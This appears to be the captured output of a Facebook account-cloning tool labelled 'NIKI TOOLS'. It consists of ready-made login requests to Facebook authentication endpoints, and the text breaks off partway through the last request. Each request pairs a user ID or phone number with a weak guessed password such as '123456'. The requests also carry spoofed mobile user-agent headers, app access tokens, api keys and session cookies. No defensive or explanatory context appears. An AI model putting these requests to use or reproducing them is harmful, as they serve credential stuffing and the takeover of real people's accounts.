#-NIKI TOOLS
#-CAPTURE BY NOOR
#-FILE CLONE
-------------------------------------------------------
#-M1
-------------------------------------------------------
~/ NOOR DATA : adid=269795f9-3ec7-4819-a6d4-f7b072b575be&format=json&device_id=e404f258-8ddc-4ae1-9574-96ecb705e73f&cpl=true&family_device_id=26f5b5ef-2501-4d9c-a465-b4afe0ffd866&credentials_type=device_based_login_password&error_detail_type=button_with_disabled&source=device_based_login&email=100000871438865&password=1234567&access_token=350685531728%7C62f8ce9f74b12f84c123cc23437a4a32&generate_session_cookies=1&meta_inf_fbmeta=&advertiser_id=a3f2f542-bbb2-4a65-9534-57d7a884fccf&currently_logged_in_userid=0&locale=es_La&client_country_code=La&method=auth.login&fb_api_req_friendly_name=authenticate&fb_api_caller_class=com.facebook.account.login.protocol.Fb4aAuthHandler&api_key=882a8490361da98702bf97a021ddc14d
-------------------------------------------------------
~/ NOOR HEADERS : {'User-Agent': '[FBAN/FB4A; FBAV/49.0.0.4740;FBBV/4459680;[FBAN/FB4A; FBAV/233.0.0.29.199; FBBV/288643688; FBDM/{density=2.33,width=1222,height=2888); FBLC/fr_CI; FBCR/Virgin Media; FBMF/samsung; FBBD/samsung; FBPN/com.facebook.katana;FBDV/SM-A325F;FBSV/10;nullFBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '67214', 'X-FB-SIM-HNI': '88436', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '3884', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Content-Length': '701'}
-------------------------------------------------------
~/ NOOR URL : https://b-graph.facebook.com/auth/login
-------------------------------------------------------
#-M2
-------------------------------------------------------
~/ NOOR DATA : adid=2a06da5b-f2dc-4809-82e5-e7957afac5b9&format=json&device_id=f0b78fb3-9761-49b8-8541-59f6461052f8&cpl=true&family_device_id=30ff8984-9b32-4851-9d66-634ddfb2d8be&credentials_type=device_based_login_password&error_detail_type=button_with_disabled&source=device_based_login&email=100000968656871&password=123456&access_token=350685531728%257C62f8ce9f74b12f84c123cc23437a4a32&generate_session_cookies=1&meta_inf_fbmeta=&advertiser_id=a4e87cd2-47e3-4e24-b0ac-1485eaedce50&currently_logged_in_userid=0&locale=en_US&client_country_code=US&method=auth.login&fb_api_req_friendly_name=authenticate&fb_api_caller_class=com.facebook.account.login.protocol.Fb4aAuthHandler&api_key=882a8490361da98702bf97a021ddc14d
-------------------------------------------------------
~/ NOOR HEADERS : {'User-Agent': '[FBAN/FB4A; FBAV/92.0.0.9613;FBBV/3083729;[FBAN/FB4A; FBAV/233.0.0.29.199; FBBV/288643688; FBDM/{density=2.33,width=1222,height=2888); FBLC/fr_CI; FBCR/Virgin Media; FBMF/samsung; FBBD/samsung; FBPN/com.facebook.katana;FBDV/SM-A325F;FBSV/10;nullFBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '34843', 'X-FB-SIM-HNI': '20430', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Content-Length': '703'}
-------------------------------------------------------
~/ NOOR URL : https://api.facebook.com/auth/login
-------------------------------------------------------
#-M3
-------------------------------------------------------
~/ NOOR DATA : adid=e9710a38-7ecd-4fdd-9c63-395d0aa325af&format=json&device_id=42e1950d-1d0e-441c-bc6a-5302f16eb9bd&email=100005499286580&password=123456&generate_analytics_claims=1&community_id=&cpl=true&try_num=1&family_device_id=f10b1eea-f9a2-4641-acc1-c062bff71311&credentials_type=password&source=login&error_detail_type=button_with_disabled&enroll_misauth=false&generate_session_cookies=1&generate_machine_id=1&currently_logged_in_userid=0&locale=en_US&client_country_code=US&fb_api_req_friendly_name=authenticate&api_key=62f8ce9f74b12f84c123cc23437a4a32&access_token=350685531728%7C62f8ce9f74b12f84c123cc23437a4a32
-------------------------------------------------------
~/ NOOR HEADERS : {'User-Agent': '[FBAN/FB4A; FBAV/50.0.0.9400;FBBV/6216448;[FBAN/FB4A; FBAV/233.0.0.29.199; FBBV/288643688; FBDM/{density=2.33,width=1222,height=2888); FBLC/fr_CI; FBCR/Virgin Media; FBMF/samsung; FBBD/samsung; FBPN/com.facebook.katana;FBDV/SM-A325F;FBSV/10;nullFBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'b-api.facebook.com', 'X-FB-Net-HNI': '56931', 'X-FB-SIM-HNI': '20967', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=62f8ce9f74b12f84c123cc23437a4a32', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': '62f8ce9f74b12f84c123cc23437a4a32', 'Content-Length': '606'}
-------------------------------------------------------
~/ NOOR URL : https://b-api.facebook.com/method/auth.login
-------------------------------------------------------
#-M4
-------------------------------------------------------
~/ NOOR DATA : adid=c58e06ff-125a-4df5-8523-14e73955b920&format=json&device_id=98360262-0983-47fd-a161-1bedf2725686&cpl=true&family_device_id=526ef090-acad-4231-a958-91b701dac67e&credentials_type=device_based_login_password&error_detail_type=button_with_disabled&source=device_based_login&email=100001085903793&password=123456&access_token=350685531728%257C62f8ce9f74b12f84c123cc23437a4a32&generate_session_cookies=1&meta_inf_fbmeta=&advertiser_id=856f6121-2e7b-4b36-897d-42819544c1b6&currently_logged_in_userid=0&locale=en_US&client_country_code=US&method=auth.login&fb_api_req_friendly_name=authenticate&fb_api_caller_class=com.facebook.account.login.protocol.Fb4aAuthHandler&api_key=882a8490361da98702bf97a021ddc14d
-------------------------------------------------------
~/ NOOR HEADERS : {'User-Agent': '[FBAN/FB4A; FBAV/37.0.0.5766;FBBV/7816266;[FBAN/FB4A; FBAV/238.0.0.44.76; FBBV/144459868; FBDM/{density=2.0,width=720,height=1362); FBLC/fr_CI; FBCR/OrangeSwitzerland; FBMF/samsung; FBBD/samsung; FBPN/com.facebook.katana;FBDV/SM-T210R;FBSV/4.4.2;nullFBCA/x86:armeabi-v7a;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'b-graph.facebook.com', 'X-Fb-Privacy-Context': '2368177546817046', 'X-Graphql-Client-Library': 'graphservice', 'X-Fb-Rmd': 'cached=0;state=URL_ELIGIBLE', 'X-Graphql-Request-Purpose': 'fetch', 'X-Fb-Background-State': '1', 'X-FB-Net-HNI': '94631', 'X-FB-SIM-HNI': '39209', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=DQGq3fmNKvVh;tid=135;nc=1;fc=1;bc=0;cid=ef0e330bff1cd312f36aa5f2c69c59a9', 'x-fb-device-group': '4481', 'X-FB-Friendly-Name': 'SuggestionsFriendListContentQuery', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'ef0e330bff1cd312f36aa5f2c69c59a9', 'Content-Length': '704'}
-------------------------------------------------------
~/ NOOR URL : https://b-graph.facebook.com/auth/login
-------------------------------------------------------
#-RANDOM CLONE
-------------------------------------------------------
#-M1
-------------------------------------------------------
~/ NOOR DATA : __aaid=0&__user=0&__a=1&__req=7&__hs=20122.BP%3Awbloks_caa_pkg.2.0...0&dpr=3&__ccg=EXCELLENT&__rev=1019778292&__s=lwtqhm%3A32ilbh%3An8ff35&__hsi=7467076295174474915&__dyn=0wzpawlE72fDg9ppo5S12wAxu13wqobE6u7E39x60lW4o3Bw4Ewk9E4W099w2s8hw73wGw6tw5Uw64w8W1uwf20n6aw8m0zE2ZwrU6q3a0le0iS2eU2dwde&__csr=&fb_dtsg=NAcOknTaT3AWiFEcFa07S3J4igr8FqfRi8cXad-ZhS0ljG4PVzeL-0w%3A0%3A0&jazoest=21026&lsd=AVqale9zPNw&params=%7B%22params%22%3A%22%7B%5C%22server_params%5C%22%3A%7B%5C%22credential_type%5C%22%3A%5C%22password%5C%22%2C%5C%22username_text_input_id%5C%22%3A%5C%22o83gr9%3A68%5C%22%2C%5C%22password_text_input_id%5C%22%3A%5C%22o83gr9%3A69%5C%22%2C%5C%22login_source%5C%22%3A%5C%22Login%5C%22%2C%5C%22login_credential_type%5C%22%3A%5C%22none%5C%22%2C%5C%22server_login_source%5C%22%3A%5C%22login%5C%22%2C%5C%22ar_event_source%5C%22%3A%5C%22login_home_page%5C%22%2C%5C%22should_trigger_override_login_success_action%5C%22%3A0%2C%5C%22should_trigger_override_login_2fa_action%5C%22%3A0%2C%5C%22is_caa_perf_enabled%5C%22%3A0%2C%5C%22reg_flow_source%5C%22%3A%5C%22login_home_native_integration_point%5C%22%2C%5C%22caller%5C%22%3A%5C%22gslr%5C%22%2C%5C%22is_from_landing_page%5C%22%3A0%2C%5C%22is_from_empty_password%5C%22%3A0%2C%5C%22is_from_password_entry_page%5C%22%3A0%2C%5C%22is_from_assistive_id%5C%22%3A0%2C%5C%22is_from_msplit_fallback%5C%22%3A0%2C%5C%22INTERNAL__latency_qpl_marker_id%5C%22%3A36707139%2C%5C%22INTERNAL__latency_qpl_instance_id%5C%22%3A%5C%22146478683700383%5C%22%2C%5C%22device_id%5C%22%3Anull%2C%5C%22family_device_id%5C%22%3Anull%2C%5C%22waterfall_id%5C%22%3A%5C%22ec9422be-4fd9-4430-b386-f434c544983d%5C%22%2C%5C%22offline_experiment_group%5C%22%3Anull%2C%5C%22layered_homepage_experiment_group%5C%22%3Anull%2C%5C%22is_platform_login%5C%22%3A0%2C%5C%22is_from_logged_in_switcher%5C%22%3A0%2C%5C%22is_from_logged_out%5C%22%3A0%2C%5C%22access_flow_version%5C%22%3A%5C%22F2_FLOW%5C%22%7D%2C%5C%22client_input_params%5C%22%3A%7B%5C%22machine_id%5C%22%3A%5C%22%5C%22%2C%5C%22contact_point%5C%22%3A%5C%220176484897%5C%22%2C%5C%22password%5C%22%3A%5C%22%23PWD_BROWSER%3A0%3A1742401463%3Afirdt%5C%22%2C%5C%22accounts_list%5C%22%3A%5B%5D%2C%5C%22fb_ig_device_id%5C%22%3A%5B%5D%2C%5C%22secure_family_device_id%5C%22%3A%5C%22%5C%22%2C%5C%22encrypted_msisdn%5C%22%3A%5C%22%5C%22%2C%5C%22headers_infra_flow_id%5C%22%3A%5C%22%5C%22%2C%5C%22try_num%5C%22%3A1%2C%5C%22login_attempt_count%5C%22%3A1%2C%5C%22event_flow%5C%22%3A%5C%22login_manual%5C%22%2C%5C%22event_step%5C%22%3A%5C%22home_page%5C%22%2C%5C%22openid_tokens%5C%22%3A%7B%7D%2C%5C%22auth_secure_device_id%5C%22%3A%5C%22%5C%22%2C%5C%22client_known_key_hash%5C%22%3A%5C%22%5C%22%2C%5C%22has_whatsapp_installed%5C%22%3A0%2C%5C%22sso_token_map_json_string%5C%22%3A%5C%22%5C%22%2C%5C%22should_show_nested_nta_from_aymh%5C%22%3A0%2C%5C%22password_contains_non_ascii%5C%22%3A%5C%22false%5C%22%2C%5C%22has_granted_read_contacts_permissions%5C%22%3A0%2C%5C%22has_granted_read_phone_permissions%5C%22%3A0%2C%5C%22app_manager_id%5C%22%3A%5C%22%5C%22%2C%5C%22lois_settings%5C%22%3A%7B%5C%22lois_token%5C%22%3A%5C%22%5C%22%7D%7D%7D%22%7D
-------------------------------------------------------
~/ NOOR HEADERS : {'user-agent': 'Mozilla/5.0 (Linux; Android 13; GT 10 Pro Build/PQ3A.958575.60659480) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5270.92 Mobile Safari/537.36', 'accept-encoding': 'gzip, deflate, br, zstd', 'accept': '*/*', 'Connection': 'keep-alive', 'authority': 'touch.facebook.com', 'method': 'POST', 'path': '/async/wbloks/fetch/?appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=2c4733784ae1256fe36c8fac264a2939b8558cfc1bad5ac672c9bc60482cab5a', 'scheme': 'https', 'Content-Length': '3085', 'sec-ch-ua-full-version-list': '"Chromium";v="130.0.0.0", "Mises";v="130.0.0.0", "Not?A_Brand";v="99.0.0.0"', 'sec-ch-ua-platform': '"Android"', 'sec-ch-ua': '"Chromium";v="130", "Mises";v="130", "Not?A_Brand";v="99"', 'sec-ch-ua-model': '""', 'sec-ch-ua-mobile': '?1', 'sec-ch-prefers-color-scheme': 'light', 'content-type': 'application/x-www-form-urlencoded;charset=UTF-8', 'sec-ch-ua-platform-version': '13.0.0', 'origin': 'https://touch.facebook.com', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty', 'referer': 'https://touch.facebook.com/login/', 'accept-language': 'ur-PK,en-GB;q=0.9,en-US;q=0.8,en;q=0.7', 'priority': 'u=1, i', 'Cookie': 'datr=uu_aZ968wWVgzTmzas_3ct8p; fr=09TgDQ1VIegXWAeo2..Bn2u-6..AAA.0.0.Bn2u-6.AWVdWBhHqaA; sb=uu_aZy6ufm1YQ6fE7j1hjD42'}
-------------------------------------------------------
~/ NOOR URL : https://touch.facebook.com/async/wbloks/fetch/?appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=2c4733784ae1256fe36c8fac264a2939b8558cfc1bad5ac672c9bc60482cab5a&appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=2c4733784ae1256fe36c8fac264a2939b8558cfc1bad5ac672c9bc60482cab5a
-------------------------------------------------------
#-M2
-------------------------------------------------------
~/ NOOR DATA : __aaid=0&__user=0&__a=1&__req=5&__hs=20152.BP%3Awbloks_caa_pkg.2.0...0&dpr=3&__ccg=EXCELLENT&__rev=1020600823&__s=tugytq%3Af8rh4m%3Axf8nm5&__hsi=7478253372806187423&__dyn=0wzpawlE72fDg9ppo5S12wAxu13wqobE6u7E39x60lW4o3Bw4Ewk9E4W099w2s8hw73wGw6tw5Uw64w8W1uwf20n6aw8m0zE2ZwrU6q3a0le0iS2eU2dwde&__csr=&fb_dtsg=NAcNM_K8Cas4ic9SdW4rrWmTx7CTMaNl41M8Y3B7TekrRoQpfMR_JuA%3A0%3A0&jazoest=2795&lsd=AVpJ8-44DVc&params=%7B%22params%22%3A%22%7B%5C%22server_params%5C%22%3A%7B%5C%22credential_type%5C%22%3A%5C%22password%5C%22%2C%5C%22username_text_input_id%5C%22%3A%5C%22plult7%3A68%5C%22%2C%5C%22password_text_input_id%5C%22%3A%5C%22plult7%3A69%5C%22%2C%5C%22login_source%5C%22%3A%5C%22Login%5C%22%2C%5C%22login_credential_type%5C%22%3A%5C%22none%5C%22%2C%5C%22server_login_source%5C%22%3A%5C%22login%5C%22%2C%5C%22ar_event_source%5C%22%3A%5C%22login_home_page%5C%22%2C%5C%22should_trigger_override_login_success_action%5C%22%3A0%2C%5C%22should_trigger_override_login_2fa_action%5C%22%3A0%2C%5C%22is_caa_perf_enabled%5C%22%3A1%2C%5C%22reg_flow_source%5C%22%3A%5C%22aymh_multi_profiles_native_integration_point%5C%22%2C%5C%22caller%5C%22%3A%5C%22gslr%5C%22%2C%5C%22is_from_landing_page%5C%22%3A0%2C%5C%22is_from_empty_password%5C%22%3A0%2C%5C%22is_from_password_entry_page%5C%22%3A0%2C%5C%22is_from_assistive_id%5C%22%3A0%2C%5C%22is_from_msplit_fallback%5C%22%3A0%2C%5C%22INTERNAL__latency_qpl_marker_id%5C%22%3A36707139%2C%5C%22INTERNAL__latency_qpl_instance_id%5C%22%3A%5C%22154835428300395%5C%22%2C%5C%22device_id%5C%22%3Anull%2C%5C%22family_device_id%5C%22%3Anull%2C%5C%22waterfall_id%5C%22%3A%5C%22092054b0-8d67-4c09-920c-4d036238b223%5C%22%2C%5C%22offline_experiment_group%5C%22%3Anull%2C%5C%22layered_homepage_experiment_group%5C%22%3Anull%2C%5C%22is_platform_login%5C%22%3A0%2C%5C%22is_from_logged_in_switcher%5C%22%3A0%2C%5C%22is_from_logged_out%5C%22%3A0%2C%5C%22access_flow_version%5C%22%3A%5C%22pre_mt_behavior%5C%22%7D%2C%5C%22client_input_params%5C%22%3A%7B%5C%22machine_id%5C%22%3A%5C%22%5C%22%2C%5C%22contact_point%5C%22%3A%5C%22017%5C%22%2C%5C%22password%5C%22%3A%5C%22%23PWD_BROWSER%3A0%3A1742402556%3A017%5C%22%2C%5C%22accounts_list%5C%22%3A%5B%5D%2C%5C%22fb_ig_device_id%5C%22%3A%5B%5D%2C%5C%22secure_family_device_id%5C%22%3A%5C%22%5C%22%2C%5C%22encrypted_msisdn%5C%22%3A%5C%22%5C%22%2C%5C%22headers_infra_flow_id%5C%22%3A%5C%22%5C%22%2C%5C%22try_num%5C%22%3A1%2C%5C%22login_attempt_count%5C%22%3A1%2C%5C%22event_flow%5C%22%3A%5C%22login_manual%5C%22%2C%5C%22event_step%5C%22%3A%5C%22home_page%5C%22%2C%5C%22openid_tokens%5C%22%3A%7B%7D%2C%5C%22auth_secure_device_id%5C%22%3A%5C%22%5C%22%2C%5C%22client_known_key_hash%5C%22%3A%5C%22%5C%22%2C%5C%22has_whatsapp_installed%5C%22%3A0%2C%5C%22sso_token_map_json_string%5C%22%3A%5C%22%5C%22%2C%5C%22should_show_nested_nta_from_aymh%5C%22%3A1%2C%5C%22password_contains_non_ascii%5C%22%3A%5C%22false%5C%22%2C%5C%22has_granted_read_contacts_permissions%5C%22%3A0%2C%5C%22has_granted_read_phone_permissions%5C%22%3A0%2C%5C%22app_manager_id%5C%22%3A%5C%22%5C%22%2C%5C%22lois_settings%5C%22%3A%7B%5C%22lois_token%5C%22%3A%5C%22%5C%22%7D%7D%7D%22%7D
-------------------------------------------------------
~/ NOOR HEADERS : {'user-agent': 'Mozilla/5.0 (Linux; Android 10; 53 Platinum; Windows 10 Mobile) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/100.0.4682.88 Mobile Safari/537.36', 'accept-encoding': 'gzip, deflate, br, zstd', 'accept': '*/*', 'Connection': 'keep-alive', 'authority': 'x.facebook.com', 'method': 'POST', 'path': '/async/wbloks/fetch/?appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=802d259a740f96510c1f12e9a760fee719641ad04d89abdb4372fc3605f863ff', 'scheme': 'https', 'Content-Length': '3093', 'sec-ch-ua-full-version-list': '"Not(A:Brand";v="99.0.0.0", "Google Chrome";v="133.0.6943.137", "Chromium";v="133.0.6943.137"', 'sec-ch-ua-platform': '"Android"', 'sec-ch-ua': '"Not(A:Brand";v="99", "Google Chrome";v="133", "Chromium";v="133"', 'sec-ch-ua-model': '""', 'sec-ch-ua-mobile': '?1', 'sec-ch-prefers-color-scheme': 'dark', 'content-type': 'application/x-www-form-urlencoded;charset=UTF-8', 'sec-ch-ua-platform-version': '11.0.0', 'origin': 'https://x.facebook.com', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty', 'referer': 'https://x.facebook.com/login/', 'accept-language': 'ur-PK,ur;q=0.9', 'priority': 'u=1, i', 'Cookie': 'datr=_PPaZztMqGs5lYCt9vWOoBo1; fr=0mdDdujZ7dE7p4fU0..Bn2vP8..AAA.0.0.Bn2vP8.AWXAsxKSPVU; sb=_PPaZ8P6ytCcKAFpsvN1COVh'}
-------------------------------------------------------
~/ NOOR URL : https://x.facebook.com/async/wbloks/fetch/?appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=802d259a740f96510c1f12e9a760fee719641ad04d89abdb4372fc3605f863ff&appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=802d259a740f96510c1f12e9a760fee719641ad04d89abdb4372fc3605f863ff
-------------------------------------------------------
#-M3
-------------------------------------------------------
~/ NOOR DATA : __aaid=0&__user=0&__a=1&__req=6&__hs=20113.BP%3Awbloks_caa_pkg.2.0.0.0.0&dpr=1&__ccg=GOOD&__rev=1019584156&__s=zy6ufh%3A06pjto%3Avv4q0q&__hsi=7463705094687662790&__dyn=0wzpawlE72fDg9ppo5S12wAxu13wqobE6u7E39x60lW4o3Bw4Ewk9E4W099w2s8hw73wGw6tw5Uw64w8W1uwf20jG3qaw8m0zE2ZwrU6q3a0le0iS2eU2dwde&__csr=&fb_dtsg=NAcMphnexN-O-SHo42CXKXtExycsAqPYFvU93tWIO58KQiOkidDhETw%3A0%3A0&jazoest=21018&lsd=AVpey6urFOc&params=%7B%22params%22%3A+%22%7B%5C%22server_params%5C%22%3A+%7B%5C%22credential_type%5C%22%3A+%5C%22password%5C%22%2C+%5C%22username_text_input_id%5C%22%3A+%5C%22owjo2o%3A68%5C%22%2C+%5C%22password_text_input_id%5C%22%3A+%5C%22owjo2o%3A69%5C%22%2C+%5C%22login_source%5C%22%3A+%5C%22Login%5C%22%2C+%5C%22login_credential_type%5C%22%3A+%5C%22none%5C%22%2C+%5C%22server_login_source%5C%22%3A+%5C%22login%5C%22%2C+%5C%22ar_event_source%5C%22%3A+%5C%22login_home_page%5C%22%2C+%5C%22should_trigger_override_login_success_action%5C%22%3A+0%2C+%5C%22should_trigger_override_login_2fa_action%5C%22%3A+0%2C+%5C%22is_caa_perf_enabled%5C%22%3A+0%2C+%5C%22reg_flow_source%5C%22%3A+%5C%22login_home_native_integration_point%5C%22%2C+%5C%22caller%5C%22%3A+%5C%22gslr%5C%22%2C+%5C%22is_from_landing_page%5C%22%3A+0%2C+%5C%22is_from_empty_password%5C%22%3A+0%2C+%5C%22is_from_password_entry_page%5C%22%3A+0%2C+%5C%22is_from_assistive_id%5C%22%3A+0%2C+%5C%22is_from_msplit_fallback%5C%22%3A+0%2C+%5C%22INTERNAL__latency_qpl_marker_id%5C%22%3A+36707139%2C+%5C%22INTERNAL__latency_qpl_instance_id%5C%22%3A+%5C%22150585360000418%5C%22%2C+%5C%22device_id%5C%22%3A+null%2C+%5C%22family_device_id%5C%22%3A+null%2C+%5C%22waterfall_id%5C%22%3A+%5C%220733ac38-9185-45c4-a8e5-f7382144f24c%5C%22%2C+%5C%22offline_experiment_group%5C%22%3A+null%2C+%5C%22layered_homepage_experiment_group%5C%22%3A+null%2C+%5C%22is_platform_login%5C%22%3A+0%2C+%5C%22is_from_logged_in_switcher%5C%22%3A+0%2C+%5C%22is_from_logged_out%5C%22%3A+0%2C+%5C%22access_flow_version%5C%22%3A+%5C%22F2_FLOW%5C%22%7D%2C+%5C%22client_input_params%5C%22%3A+%7B%5C%22machine_id%5C%22%3A+%5C%22%5C%22%2C+%5C%22contact_point%5C%22%3A+%5C%22017863239%5C%22%2C+%5C%22password%5C%22%3A+%5C%22%23PWD_BROWSER%3A0%3A1742402897%3A017863239%5C%22%2C+%5C%22accounts_list%5C%22%3A+%5B%5D%2C+%5C%22fb_ig_device_id%5C%22%3A+%5B%5D%2C+%5C%22secure_family_device_id%5C%22%3A+%5C%22%5C%22%2C+%5C%22encrypted_msisdn%5C%22%3A+%5C%22%5C%22%2C+%5C%22headers_infra_flow_id%5C%22%3A+%5C%22%5C%22%2C+%5C%22try_num%5C%22%3A+1%2C+%5C%22login_attempt_count%5C%22%3A+1%2C+%5C%22event_flow%5C%22%3A+%5C%22login_manual%5C%22%2C+%5C%22event_step%5C%22%3A+%5C%22home_page%5C%22%2C+%5C%22openid_tokens%5C%22%3A+%7B%7D%2C+%5C%22auth_secure_device_id%5C%22%3A+%5C%22%5C%22%2C+%5C%22client_known_key_hash%5C%22%3A+%5C%22%5C%22%2C+%5C%22has_whatsapp_installed%5C%22%3A+0%2C+%5C%22sso_token_map_json_string%5C%22%3A+%5C%22%5C%22%2C+%5C%22should_show_nested_nta_from_aymh%5C%22%3A+0%2C+%5C%22password_contains_non_ascii%5C%22%3A+%5C%22false%5C%22%2C+%5C%22has_granted_read_contacts_permissions%5C%22%3A+0%2C+%5C%22has_granted_read_phone_permissions%5C%22%3A+0%2C+%5C%22app_manager_id%5C%22%3A+%5C%22%5C%22%2C+%5C%22lois_settings%5C%22%3A+%7B%5C%22lois_token%5C%22%3A+%5C%22%5C%22%7D%7D%7D%22%7D
-------------------------------------------------------
~/ NOOR HEADERS : {'User-Agent': 'Mozilla/5.0 (Linux; Android 13; Classic Z51) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.3758.93 Mobile Safari/537.36', 'Accept-Encoding': 'gzip, deflate, br', 'Accept': '*/*', 'Connection': 'keep-alive', 'Host': 'touch.facebook.com', 'Content-Length': '3192', 'sec-ch-ua': '"Not-A.Brand";v="99", "Chromium";v="124"', 'sec-ch-ua-mobile': '?1', 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 'sec-ch-ua-platform-version': '11.0.0', 'sec-ch-ua-full-version-list': '"Not-A.Brand";v="99.0.0.0", "Chromium";v="124.0.6327.4"', 'sec-ch-ua-model': '""', 'sec-ch-prefers-color-scheme': 'dark', 'sec-ch-ua-platform': 'Android', 'Origin': 'https://touch.facebook.com', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Referer': 'https://touch.facebook.com/login/?_rdc=1&refsrc=deprecated', 'Accept-Language': 'ur-PK,ur;q=0.9', 'Cookie': 'datr=UfXaZ7LTWl90BqmKNorp0pT6; fr=0ZhCPi2vkWnX3SC8g..Bn2vVR..AAA.0.0.Bn2vVR.AWXF3jkndTc; sb=UfXaZ2mwoq6QmdxdEWU4g-t-'}
-------------------------------------------------------
~/ NOOR URL : https://touch.facebook.com/async/wbloks/fetch/?appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=5fd535e87b03188d25963938cb07bd1d90d8c2ae19ae1e964fb3d64581348bdd
-------------------------------------------------------
#-M4
-------------------------------------------------------
~/ NOOR DATA : __aaid=0&__user=0&__a=1&__req=9&__hs=20134.BP%3Awbloks_caa_pkg.2.0...0&dpr=1&__ccg=GOOD&__rev=1020149637&__s=6qo4a0%3Avd3rkp%3At6u4bj&__hsi=7471604462585507310&__dyn=0wzpawlE72fDg9ppo5S12wAxu13wqobE6u7E39x60lW4o3Bw4Ewk9E4W099w2s8hw73wGw6tw5Uw64w8W1uwf20n6aw8m0zE2ZwrU6q3a0le0iS2eU2dwde&__csr=&fb_dtsg=NAcN9B1qM_QF8s-IxggnCdzEYQAA0WyIyGVRMvobISAFRXWaqedQ0zw%3A0%3A0&jazoest=2894&lsd=AVouPFBP13w&params=%7B%22params%22%3A%22%7B%5C%22server_params%5C%22%3A%7B%5C%22credential_type%5C%22%3A%5C%22password%5C%22%2C%5C%22username_text_input_id%5C%22%3A%5C%223xazot%3A68%5C%22%2C%5C%22password_text_input_id%5C%22%3A%5C%223xazot%3A69%5C%22%2C%5C%22login_source%5C%22%3A%5C%22Login%5C%22%2C%5C%22login_credential_type%5C%22%3A%5C%22none%5C%22%2C%5C%22server_login_source%5C%22%3A%5C%22login%5C%22%2C%5C%22ar_event_source%5C%22%3A%5C%22login_home_page%5C%22%2C%5C%22should_trigger_override_login_success_action%5C%22%3A0%2C%5C%22should_trigger_override_login_2fa_action%5C%22%3A0%2C%5C%22is_caa_perf_enabled%5C%22%3A0%2C%5C%22reg_flow_source%5C%22%3A%5C%22login_home_native_integration_point%5C%22%2C%5C%22caller%5C%22%3A%5C%22gslr%5C%22%2C%5C%22is_from_landing_page%5C%22%3A0%2C%5C%22is_from_empty_password%5C%22%3A0%2C%5C%22is_from_password_entry_page%5C%22%3A0%2C%5C%22is_from_assistive_id%5C%22%3A0%2C%5C%22is_from_msplit_fallback%5C%22%3A0%2C%5C%22INTERNAL__latency_qpl_marker_id%5C%22%3A36707139%2C%5C%22INTERNAL__latency_qpl_instance_id%5C%22%3A%5C%2223733866900398%5C%22%2C%5C%22device_id%5C%22%3Anull%2C%5C%22family_device_id%5C%22%3Anull%2C%5C%22waterfall_id%5C%22%3A%5C%221850e953-030c-4baa-8851-79945df6060b%5C%22%2C%5C%22offline_experiment_group%5C%22%3Anull%2C%5C%22layered_homepage_experiment_group%5C%22%3Anull%2C%5C%22is_platform_login%5C%22%3A0%2C%5C%22is_from_l